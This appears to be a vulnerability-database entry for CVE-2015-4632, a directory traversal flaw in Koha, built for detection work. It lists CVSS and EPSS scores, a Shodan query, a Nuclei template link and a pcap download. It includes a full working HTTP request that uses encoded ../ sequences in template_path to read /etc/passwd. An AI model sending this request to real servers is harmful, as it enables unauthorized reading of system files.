🔙 목록으로 돌아가기

CVE-2015-4632: Koha 3.20.1 - Directory Traversal

TitleKoha 3.20.1 - Directory Traversal
Authordaffainfo
SeverityHigh
ImpactAn attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise.
RemediationUpgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.
CVSS Score7.5
EPSS Score0.77745
CVE IDCVE-2015-4632
CWE IDCWE-22
Shodan Querycpe:"cpe:2.3:a:koha:koha"
Tags cve2015 cve lfi edb koha vuln

🔍 Vulnerability Description

Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.

🌐 HTTP Request

GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4632.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-4632.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A